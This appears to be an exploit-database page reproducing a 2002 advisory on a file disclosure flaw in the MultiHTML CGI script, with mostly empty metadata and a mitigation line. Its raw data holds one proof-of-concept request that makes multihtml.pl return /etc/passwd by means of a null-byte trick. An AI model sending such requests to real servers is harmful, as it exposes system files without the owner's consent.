header-logo
Suggest Exploit
vendor:
MultiHTML
by:
SecurityFocus
7.5
CVSS
HIGH
File Disclosure
200
CWE
Product Name: MultiHTML
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2002

MultiHTML File Disclosure Vulnerability

MultiHTML is prone to a file disclosure vulnerability. It is possible for remote attackers to issue requests which are capable of disclosing sensitive webserver readable resources on the system hosting the software.

Mitigation:

Ensure that the web server is configured to deny requests for sensitive resources.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/6711/info

MultiHTML is prone to a file disclosure vulnerability.

It is possible for remote attackers to issue requests which are capable of disclosing sensitive webserver readable resources on the system hosting the software.

http://www.example.com/cgi-bin/multihtml.pl?multi=/etc/passwd%00html

Navigation

Suggest Exploit

Services By CQR